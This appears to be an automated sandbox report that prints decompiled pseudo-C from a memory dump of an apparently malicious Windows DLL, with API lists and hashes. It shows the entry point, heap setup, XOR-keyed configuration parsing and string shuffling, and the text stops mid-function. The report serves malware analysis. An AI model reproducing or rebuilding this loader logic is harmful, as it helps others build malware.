                                                          • Instruction ID: c69747eccb7dbaef7945130bd393d0a801f9e3f1065f76c900217eea5e184ac2
                                                          • Opcode Fuzzy Hash: 093feacedc84cd86e627b2b8ed986ac2961040a725ee3d9e00591a73ddc7e891
                                                          • Instruction Fuzzy Hash: 9B11A572A44381BFF710AB64DC19B5A7B98DB45357F004519FA85D7280FBB5FC008665
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E04635BA2(signed int __edx) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				CHAR* _v16;
                                                          				long _v20;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t21;
                                                          				CHAR* _t22;
                                                          				CHAR* _t25;
                                                          				intOrPtr _t26;
                                                          				void* _t27;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				CHAR* _t36;
                                                          				CHAR* _t43;
                                                          				CHAR* _t44;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				CHAR* _t54;
                                                          				signed char _t56;
                                                          				intOrPtr _t58;
                                                          				signed int _t59;
                                                          				void* _t62;
                                                          				CHAR* _t65;
                                                          				CHAR* _t66;
                                                          				char* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t61 = __edx;
                                                          				_v20 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_t21 = E04636C09();
                                                          				if(_t21 != 0) {
                                                          					_t59 =  *0x463d25c; // 0x4000000a
                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                          					 *0x463d25c = (_t59 & 0xf0000000) + _t21;
                                                          				}
                                                          				_t22 =  *0x463d160(0, 2); // executed
                                                          				_v16 = _t22;
                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                          					_t25 = E0463496B( &_v8,  &_v20); // executed
                                                          					_t54 = _t25;
                                                          					_t26 =  *0x463d2a8; // 0x88a5a8
                                                          					if( *0x463d25c > 5) {
                                                          						_t8 = _t26 + 0x463e5cd; // 0x4d283a53
                                                          						_t27 = _t8;
                                                          					} else {
                                                          						_t7 = _t26 + 0x463e9f5; // 0x44283a44
                                                          						_t27 = _t7;
                                                          					}
                                                          					E0463729A(_t27, _t27);
                                                          					_t31 = E0463232F(_t61,  &_v20,  &_v12); // executed
                                                          					if(_t31 == 0) {
                                                          						CloseHandle(_v20);
                                                          					}
                                                          					_t62 = 5;
                                                          					if(_t54 != _t62) {
                                                          						 *0x463d270 =  *0x463d270 ^ 0x81bbe65d;
                                                          						_t32 = E0463A71F(0x60);
                                                          						 *0x463d32c = _t32;
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							_push(8);
                                                          							_pop(0);
                                                          						} else {
                                                          							memset(_t32, 0, 0x60);
                                                          							_t49 =  *0x463d32c; // 0x4ec95b0
                                                          							_t68 = _t68 + 0xc;
                                                          							__imp__(_t49 + 0x40);
                                                          							_t51 =  *0x463d32c; // 0x4ec95b0
                                                          							 *_t51 = 0x463e81a;
                                                          						}
                                                          						_t54 = 0;
                                                          						__eflags = 0;
                                                          						if(0 == 0) {
                                                          							_t36 = RtlAllocateHeap( *0x463d238, 0, 0x43);
                                                          							 *0x463d2c8 = _t36;
                                                          							__eflags = _t36;
                                                          							if(_t36 == 0) {
                                                          								_push(8);
                                                          								_pop(0);
                                                          							} else {
                                                          								_t56 =  *0x463d25c; // 0x4000000a
                                                          								_t61 = _t56 & 0x000000ff;
                                                          								_t58 =  *0x463d2a8; // 0x88a5a8
                                                          								_t13 = _t58 + 0x463e55a; // 0x697a6f4d
                                                          								_t55 = _t13;
                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x463c287);
                                                          							}
                                                          							_t54 = 0;
                                                          							__eflags = 0;
                                                          							if(0 == 0) {
                                                          								asm("sbb eax, eax");
                                                          								E04639135( ~_v8 &  *0x463d270,  &E0463D00C); // executed
                                                          								_t54 = E0463888E(_t55);
                                                          								__eflags = _t54;
                                                          								if(_t54 != 0) {
                                                          									goto L30;
                                                          								}
                                                          								_t43 = E046387AE(); // executed
                                                          								__eflags = _t43;
                                                          								if(_t43 != 0) {
                                                          									__eflags = _v8;
                                                          									_t65 = _v12;
                                                          									if(_v8 != 0) {
                                                          										L29:
                                                          										_t44 = E046351B0(_t61, _t65, _v8); // executed
                                                          										_t54 = _t44;
                                                          										goto L30;
                                                          									}
                                                          									__eflags = _t65;
                                                          									if(__eflags == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t54 = E04631C66(__eflags,  &(_t65[4]));
                                                          									__eflags = _t54;
                                                          									if(_t54 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L29;
                                                          								}
                                                          								_t54 = 8;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t66 = _v12;
                                                          						if(_t66 == 0) {
                                                          							L30:
                                                          							if(_v16 == 0 || _v16 == 1) {
                                                          								 *0x463d15c();
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_t67 =  &(_t66[4]);
                                                          						do {
                                                          						} while (E0463A273(_t62, _t67, 0, 1) == 0x4c7);
                                                          					}
                                                          					goto L30;
                                                          				} else {
                                                          					_t54 = _t22;
                                                          					L34:
                                                          					return _t54;
                                                          				}
                                                          			}



                                                          APIs
                                                            • Part of subcall function 04636C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04635BBB,00000000,00000000), ref: 04636C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04635C38
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • memset.NTDLL ref: 04635C87
                                                          • RtlInitializeCriticalSection.NTDLL(04EC9570), ref: 04635C98
                                                            • Part of subcall function 04631C66: memset.NTDLL ref: 04631C7B
                                                            • Part of subcall function 04631C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04631CBD
                                                            • Part of subcall function 04631C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04631CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04635CC3
                                                          • wsprintfA.USER32 ref: 04635CF3
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: b6c2568629773493d7a2ca8e81c6435a876f206a3349da6862036c202f06f430
                                                          • Instruction ID: a4e7a313ceac5a5f45394f4fc0abf13df5bffe2af05a1fdf9e5ff78f1cdc3b89
                                                          • Opcode Fuzzy Hash: b6c2568629773493d7a2ca8e81c6435a876f206a3349da6862036c202f06f430
                                                          • Instruction Fuzzy Hash: 8F5173B1A00294BBEB21EFA4D888B5E77A8EB14B17F44441AF502D7240F779BD458B98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 22%
                                                          			E046362DA(signed int __eax, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _t81;
                                                          				char _t83;
                                                          				signed int _t90;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				char _t101;
                                                          				unsigned int _t102;
                                                          				intOrPtr _t103;
                                                          				char* _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int _t118;
                                                          				signed int _t122;
                                                          				intOrPtr _t124;
                                                          
                                                          				_t102 = _a8;
                                                          				_t118 = 0;
                                                          				_v20 = __eax;
                                                          				_t122 = (_t102 >> 2) + 1;
                                                          				_v8 = 0;
                                                          				_a8 = 0;
                                                          				_t81 = E0463A71F(_t122 << 2);
                                                          				_v16 = _t81;
                                                          				if(_t81 == 0) {
                                                          					_push(8);
                                                          					_pop(0);
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t107 = _a4;
                                                          				_a4 = _t102;
                                                          				_t113 = 0;
                                                          				while(1) {
                                                          					_t83 =  *_t107;
                                                          					if(_t83 == 0) {
                                                          						break;
                                                          					}
                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                          						if(_t118 != 0) {
                                                          							if(_t118 > _v8) {
                                                          								_v8 = _t118;
                                                          							}
                                                          							_a8 = _a8 + 1;
                                                          							_t118 = 0;
                                                          						}
                                                          						 *_t107 = 0;
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t118 != 0) {
                                                          							L10:
                                                          							_t118 = _t118 + 1;
                                                          							L16:
                                                          							_t107 = _t107 + 1;
                                                          							_t15 =  &_a4;
                                                          							 *_t15 = _a4 - 1;
                                                          							if( *_t15 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						if(_t113 == _t122) {
                                                          							L21:
                                                          							if(_a8 <= 0x20) {
                                                          								_push(0xb);
                                                          								L34:
                                                          								_pop(0);
                                                          								L35:
                                                          								E0463A734(_v16);
                                                          								goto L37;
                                                          							}
                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                          							_t103 = E0463A71F((_v8 + _t24) * _a8 + 4);
                                                          							if(_t103 == 0) {
                                                          								_push(8);
                                                          								goto L34;
                                                          							}
                                                          							_t90 = _a8;
                                                          							_a4 = _a4 & 0x00000000;
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_t124 = _t103 + _t90 * 4;
                                                          							if(_t90 <= 0) {
                                                          								L31:
                                                          								 *0x463d278 = _t103;
                                                          								goto L35;
                                                          							}
                                                          							do {
                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                          								_v12 = _v12 & 0x00000000;
                                                          								if(_a4 <= 0) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t99 = _v12;
                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                          									if(_t99 == 0) {
                                                          										break;
                                                          									}
                                                          									_v12 = _v12 + 1;
                                                          									if(_v12 < _a4) {
                                                          										continue;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_v8 = _v8 - 1;
                                                          								L30:
                                                          								_t97 = _a4;
                                                          								_a4 = _a4 + 1;
                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                          								__imp__(_t124);
                                                          								_v8 = _v8 + 1;
                                                          								_t124 = _t124 + _t97 + 1;
                                                          							} while (_v8 < _a8);
                                                          							goto L31;
                                                          						}
                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                          						_t101 = _t83;
                                                          						if(_t83 - 0x61 <= 0x19) {
                                                          							_t101 = _t101 - 0x20;
                                                          						}
                                                          						 *_t107 = _t101;
                                                          						_t113 = _t113 + 1;
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t118 != 0) {
                                                          					if(_t118 > _v8) {
                                                          						_v8 = _t118;
                                                          					}
                                                          					_a8 = _a8 + 1;
                                                          				}
                                                          				goto L21;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 046363D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 046363EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04636403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 04636427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 0a5303905fc427d6862c087ecaffbf114fce178a5d55292bfd6f98c629164dcc
                                                          • Instruction ID: abdb19840e261697266a80cbea960a6a90def5c9cae6bb0024090f32dbcc5c48
                                                          • Opcode Fuzzy Hash: 0a5303905fc427d6862c087ecaffbf114fce178a5d55292bfd6f98c629164dcc
                                                          • Instruction Fuzzy Hash: BE51C471A00288FBDF21CF99C4846ADBBB6FF51316F14C05AE9559B202E771FA52CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _t4;
                                                          				void* _t10;
                                                          				void* _t11;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          
                                                          				_t14 = 1;
                                                          				_t4 = _a8;
                                                          				if(_t4 == 0) {
                                                          					if(InterlockedDecrement(0x463d23c) == 0) {
                                                          						E04631B42();
                                                          					}
                                                          				} else {
                                                          					if(_t4 == 1 && InterlockedIncrement(0x463d23c) == 1) {
                                                          						_t10 = E046312E5(_t11, _t12, _a4); // executed
                                                          						if(_t10 != 0) {
                                                          							_t14 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t14;
                                                          			}


                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0463D23C), ref: 04634EDF
                                                            • Part of subcall function 046312E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04634EF2,?), ref: 046312F8
                                                          • InterlockedDecrement.KERNEL32(0463D23C), ref: 04634EFF
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: bde350a9eb3936b17bc15a9caacc7123a7d0dab120cf27856b2e5cfbc8fbe9ae
                                                          • Instruction ID: e24d4afa78eccb66c0965817520e25230cba0d96a6d4c85e1ea8913a1f1f341d
                                                          • Opcode Fuzzy Hash: bde350a9eb3936b17bc15a9caacc7123a7d0dab120cf27856b2e5cfbc8fbe9ae
                                                          • Instruction Fuzzy Hash: 47E04F223081F557E7215FB49E08B5AE642EBD1B8BF09441CF581D1110FE20F84196A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E04638D14(void* __edx) {
                                                          				char _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = __edx;
                                                          				_v12 = 0;
                                                          				_t23 = E0463A2F9(0,  &_v8); // executed
                                                          				if(_t23 != 0) {
                                                          					_v8 = 0;
                                                          				}
                                                          				_t24 =  *0x463d2a8; // 0x88a5a8
                                                          				_t4 = _t24 + 0x463edc0; // 0x4ec9368
                                                          				_t5 = _t24 + 0x463ed68; // 0x4f0053
                                                          				_t45 = E04635356( &_v16, _v8, _t5, _t4);
                                                          				if(_t45 == 0) {
                                                          					 *0x463d108(_v16, 0,  &_v12);
                                                          					_t45 = 8;
                                                          					if(_v12 < _t45) {
                                                          						_t45 = 1;
                                                          						__eflags = 1;
                                                          					} else {
                                                          						_t32 =  *0x463d2a8; // 0x88a5a8
                                                          						_t11 = _t32 + 0x463edb4; // 0x4ec935c
                                                          						_t48 = _t11;
                                                          						_t12 = _t32 + 0x463ed68; // 0x4f0053
                                                          						_t52 = E046345C6(_t11, _t12, _t11);
                                                          						_t59 = _t52;
                                                          						if(_t52 != 0) {
                                                          							_t35 =  *0x463d2a8; // 0x88a5a8
                                                          							_t13 = _t35 + 0x463edfe; // 0x30314549
                                                          							if(E04638E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                          								_t61 =  *0x463d25c - 6;
                                                          								if( *0x463d25c <= 6) {
                                                          									_t42 =  *0x463d2a8; // 0x88a5a8
                                                          									_t15 = _t42 + 0x463ec0a; // 0x52384549
                                                          									E04638E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                          								}
                                                          							}
                                                          							_t38 =  *0x463d2a8; // 0x88a5a8
                                                          							_t17 = _t38 + 0x463edf8; // 0x4ec93a0
                                                          							_t18 = _t38 + 0x463edd0; // 0x680043
                                                          							_t45 = E04635D7D(_v8, 0x80000001, _t52, _t18, _t17);
                                                          							HeapFree( *0x463d238, 0, _t52);
                                                          						}
                                                          					}
                                                          					HeapFree( *0x463d238, 0, _v16);
                                                          				}
                                                          				_t54 = _v8;
                                                          				if(_v8 != 0) {
                                                          					E04634F14(_t54);
                                                          				}
                                                          				return _t45;
                                                          			}

                                                          APIs
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04EC93A0,?,00000000,30314549,00000014,004F0053,04EC935C), ref: 04638E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0463523E), ref: 04638E12
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 0106bb074d299cdd4cb05b0a6832f256c7a82890642ad481d230c47423113206
                                                          • Instruction ID: 819b727dd7ad285430c7cb6ecc6711b04fe8fb8f70e0b721e9a18e0fd71936b6
                                                          • Opcode Fuzzy Hash: 0106bb074d299cdd4cb05b0a6832f256c7a82890642ad481d230c47423113206
                                                          • Instruction Fuzzy Hash: 91316D72900189BFEB11EB94DC44EDABBBDEF54706F04015AB60097260F671BE44DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 95%
                                                          			E0463888E(int* __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* __esi;
                                                          				signed int _t26;
                                                          				signed int _t31;
                                                          				signed int _t37;
                                                          				char* _t43;
                                                          				char* _t44;
                                                          				char* _t45;
                                                          				char* _t46;
                                                          				char* _t47;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t51;
                                                          				void* _t53;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t55;
                                                          				signed int _t58;
                                                          				intOrPtr _t61;
                                                          				signed int _t62;
                                                          				signed int _t67;
                                                          				void* _t69;
                                                          				void* _t70;
                                                          				signed int _t72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t84;
                                                          				signed int _t88;
                                                          				signed int _t92;
                                                          				void* _t97;
                                                          				intOrPtr _t114;
                                                          
                                                          				_t98 = __ecx;
                                                          				_t26 =  *0x463d2a4; // 0x63699bc3
                                                          				if(E04637145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
                                                          					 *0x463d2d8 = _v8;
                                                          				}
                                                          				_t31 =  *0x463d2a4; // 0x63699bc3
                                                          				if(E04637145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
                                                          					_v12 = 2;
                                                          					L62:
                                                          					return _v12;
                                                          				}
                                                          				_t37 =  *0x463d2a4; // 0x63699bc3
                                                          				if(E04637145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                                          					L60:
                                                          					HeapFree( *0x463d238, 0, _v16);
                                                          					goto L62;
                                                          				} else {
                                                          					_t97 = _v12;
                                                          					if(_t97 == 0) {
                                                          						_t43 = 0;
                                                          					} else {
                                                          						_t92 =  *0x463d2a4; // 0x63699bc3
                                                          						_t43 = E04636B2E(_t98, _t97, _t92 ^ 0x724e87bc);
                                                          					}
                                                          					if(_t43 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                                          							 *0x463d240 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t44 = 0;
                                                          					} else {
                                                          						_t88 =  *0x463d2a4; // 0x63699bc3
                                                          						_t44 = E04636B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
                                                          					}
                                                          					if(_t44 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                                          							 *0x463d244 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t45 = 0;
                                                          					} else {
                                                          						_t84 =  *0x463d2a4; // 0x63699bc3
                                                          						_t45 = E04636B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
                                                          					}
                                                          					if(_t45 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                          							 *0x463d248 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t46 = 0;
                                                          					} else {
                                                          						_t80 =  *0x463d2a4; // 0x63699bc3
                                                          						_t46 = E04636B2E(_t98, _t97, _t80 ^ 0x0602e249);
                                                          					}
                                                          					if(_t46 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                          							 *0x463d004 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t47 = 0;
                                                          					} else {
                                                          						_t76 =  *0x463d2a4; // 0x63699bc3
                                                          						_t47 = E04636B2E(_t98, _t97, _t76 ^ 0x3603764c);
                                                          					}
                                                          					if(_t47 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                          							 *0x463d02c = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t48 = 0;
                                                          					} else {
                                                          						_t72 =  *0x463d2a4; // 0x63699bc3
                                                          						_t48 = E04636B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
                                                          					}
                                                          					if(_t48 != 0) {
                                                          						_push(_t48);
                                                          						_t69 = 0x10;
                                                          						_t70 = E046356FA(_t69);
                                                          						if(_t70 != 0) {
                                                          							_push(_t70);
                                                          							E04636702();
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t49 = 0;
                                                          					} else {
                                                          						_t67 =  *0x463d2a4; // 0x63699bc3
                                                          						_t49 = E04636B2E(_t98, _t97, _t67 ^ 0xb30fc035);
                                                          					}
                                                          					if(_t49 != 0 && E046356FA(0, _t49) != 0) {
                                                          						_t114 =  *0x463d32c; // 0x4ec95b0
                                                          						E046323F4(_t114 + 4, _t65);
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t50 = 0;
                                                          					} else {
                                                          						_t62 =  *0x463d2a4; // 0x63699bc3
                                                          						_t50 = E04636B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
                                                          					}
                                                          					if(_t50 == 0) {
                                                          						L52:
                                                          						_t51 =  *0x463d2a8; // 0x88a5a8
                                                          						_t20 = _t51 + 0x463e252; // 0x616d692f
                                                          						 *0x463d2d4 = _t20;
                                                          						goto L53;
                                                          					} else {
                                                          						_t61 = E046356FA(0, _t50);
                                                          						 *0x463d2d4 = _t61;
                                                          						if(_t61 != 0) {
                                                          							L53:
                                                          							if(_t97 == 0) {
                                                          								_t53 = 0;
                                                          							} else {
                                                          								_t58 =  *0x463d2a4; // 0x63699bc3
                                                          								_t53 = E04636B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
                                                          							}
                                                          							if(_t53 == 0) {
                                                          								_t54 =  *0x463d2a8; // 0x88a5a8
                                                          								_t21 = _t54 + 0x463e791; // 0x6976612e
                                                          								_t55 = _t21;
                                                          							} else {
                                                          								_t55 = E046356FA(0, _t53);
                                                          							}
                                                          							 *0x463d340 = _t55;
                                                          							HeapFree( *0x463d238, 0, _t97);
                                                          							_v12 = 0;
                                                          							goto L60;
                                                          						}
                                                          						goto L52;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008), ref: 04638933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008), ref: 04638965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008), ref: 04638997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008), ref: 046389C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008), ref: 046389FB
                                                          • HeapFree.KERNEL32(00000000,04635D25,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008,?,04635D25), ref: 04638AF2
                                                          • HeapFree.KERNEL32(00000000,?,04635D25,?,63699BC3,?,04635D25,63699BC3,?,04635D25,63699BC3,00000005,0463D00C,00000008,?,04635D25), ref: 04638B05
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: b14601ca26e4ee99b8f16806b5a055aba639e1455f83f38be6b5a5b24f3e787b
                                                          • Instruction ID: dc62e13dbf0c9b7a230a8f680439bc7d5719767bf4c48877e0f8b357af4f2ddd
                                                          • Opcode Fuzzy Hash: b14601ca26e4ee99b8f16806b5a055aba639e1455f83f38be6b5a5b24f3e787b
                                                          • Instruction Fuzzy Hash: C0719E71A001C5AFE710FBB9DD8499BB7EDEF98346B281915B502D7204FA39FD428B24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E04631F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                          				intOrPtr _v0;
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v44;
                                                          				intOrPtr _v52;
                                                          				void* __edi;
                                                          				long _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr _t29;
                                                          				intOrPtr _t30;
                                                          				void* _t33;
                                                          				intOrPtr _t34;
                                                          				int _t37;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t43;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t71;
                                                          				intOrPtr _t74;
                                                          				int _t77;
                                                          				intOrPtr _t78;
                                                          				int _t81;
                                                          				intOrPtr _t83;
                                                          				int _t86;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr* _t90;
                                                          				void* _t91;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t97;
                                                          				intOrPtr _t98;
                                                          				void* _t100;
                                                          				int _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          				void* _t108;
                                                          
                                                          				_t95 = __edx;
                                                          				_t91 = __ecx;
                                                          				_t25 = __eax;
                                                          				_t105 = _a16;
                                                          				_v4 = 8;
                                                          				if(__eax == 0) {
                                                          					_t25 = GetTickCount();
                                                          				}
